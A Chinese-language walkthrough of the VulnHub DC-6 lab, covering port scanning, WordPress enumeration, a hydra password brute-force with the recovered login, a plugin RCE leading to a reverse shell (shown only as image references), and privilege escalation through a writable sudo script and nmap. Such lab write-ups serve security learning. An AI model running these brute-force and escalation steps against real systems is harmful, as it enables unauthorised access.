VulnHub::DC-6

实验环境

DC-6_1

提示改靶机只有一个入口点，并只存在一个flag

渗透过程

0x01 信息搜集

由于不知道靶机IP地址，进行D段扫描，获得靶机IP地址：

masscan 192.168.2.0/24 -p80 --rate 1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-19 03:26:28 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Discovered open port 80/tcp on 192.168.2.1
Discovered open port 80/tcp on 192.168.2.71

访问后发现71主机为靶机DC-6，进行端口扫描：

masscan 192.168.2.71 -p0-65535 --rate 1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-19 04:55:42 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 22/tcp on 192.168.2.71
Discovered open port 80/tcp on 192.168.2.71

使用nmap进行详细扫描：

nmap -sC -sV -p22,80 --min-rate 1000 192.168.2.71
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-19 12:59 CST
Nmap scan report for dc-6.lan (192.168.2.71)
Host is up (0.00070s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.64 seconds

whatweb识别：

whatweb http://wordy
http://wordy [200 OK] Apache[2.4.25], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[192.168.2.71], JQuery[1.12.4], MetaGenerator[WordPress 5.1.1], PoweredBy[WordPress], Script[text/javascript], Title[Wordy &#8211; Just another WordPress site], UncommonHeaders[link], WordPress[5.1.1]

该网站为WordPress页面。

wpscan枚举用户名：

wpscan --url http://wordy --enumerate

wpscan

0x02 解题

Reverse Shell

hydra爆破密码：

hydra -L ~/HTB/user.txt -P ~/Wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt -t 10 -f wordy http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:login_error"
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-20 00:30:51
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 13340 login tries (l:5/p:2668), ~1334 tries per task
[DATA] attacking http-post-form://wordy:80/wp-login.php:log=^USER^&pwd=^PASS^:login_error
[STATUS] 1247.00 tries/min, 1247 tries in 00:01h, 12093 to do in 00:10h, 10 active
[STATUS] 1248.00 tries/min, 3744 tries in 00:03h, 9596 to do in 00:08h, 10 active
[STATUS] 1275.71 tries/min, 8930 tries in 00:07h, 4410 to do in 00:04h, 10 active
[80][http-post-form] host: wordy   login: mark   password: helpdesk01
[STATUS] attack finished for wordy (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-20 00:39:23

成功登录后台，发现相关插件Activity monitor：

DC-6_4

搜索得到相关插件存在RCE漏洞：

RCE

exp如下：

DC-6_3

成功反弹shell：

DC-6_5

graham -> jens

查找home目录下的文件，得到如下信息：

信息搜集，可不使用密码运行backups.sh：

改文件为同用户组可写，graham于jens同组，写入shell并执行：

echo "/bin/bash" > backups.sh
sudo -u jens ./backups.sh

成功切换用户。

jens -> root

jens用户可不使用密码运行nmap命令：

nmap存在提权方式：

成功提权：